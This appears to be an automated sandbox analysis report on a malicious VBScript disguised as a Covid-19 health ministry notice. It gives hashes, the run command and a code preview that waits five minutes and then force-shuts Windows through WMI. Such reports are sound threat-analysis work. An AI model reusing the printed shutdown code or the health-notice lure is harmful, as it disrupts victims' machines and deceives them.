Preview: Set MTTDJRICBE = CreateObject("WScript.Shell")..WScript.Sleep(300000)..Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _..& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_..& "Primary=true")..for each OpSys in OpSysSet..retVal = OpSys.Win32Shutdown(6)..next..

Static File Info

General

File type:UTF-8 Unicode text, with CRLF line terminators
Entropy (8bit):5.724422800299126
TrID:
  • Visual Basic Script (13500/0) 100.00%
File name:Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs
File size:408099
MD5:bef99a24632c89aa1676f0c5e5bfb11b
SHA1:335c3b6151df7e3e31b603bd55d24c0de56a8d5a
SHA256:64f6d8c5d529aa3ab6626a3b9be57c4b9e0c2130ec3358c12d53e3453a83a76c
SHA512:d11ff4430df13dc549b938e7b6b5bac9377654df71882985f54939eebb460bf572f7b0b710866a233c2c5ab37f9b3d3a361797e73d2ce02def255269a858f767
SSDEEP:12288:jbubzbMbjb+bXb2bHbVbNbvbvbbbEbFbobBbcbobNbSbPblbqbtbdbNbSb2bobE:Z
File Content Preview:'y..N...8..p.........r..Lp.............R..s......U........9....99......k5......i...............O.....i6...7...g..v.......A...kh.......l..AW......4......5u.........'XgpL..M....2..I0...J..g....p.......s..jY...L............Jto....6....6D..Z......Ri..9.......

File Icon

Icon Hash:e8d69ece869a9ec4

Network Behavior

No network behavior found

Code Manipulations

Statistics

System Behavior

General

Start time:11:46:34
Start date:10/02/2021
Path:C:\Windows\System32\wscript.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs'
Imagebase:0x7ff7227a0000
File size:163840 bytes
MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis

Reset < >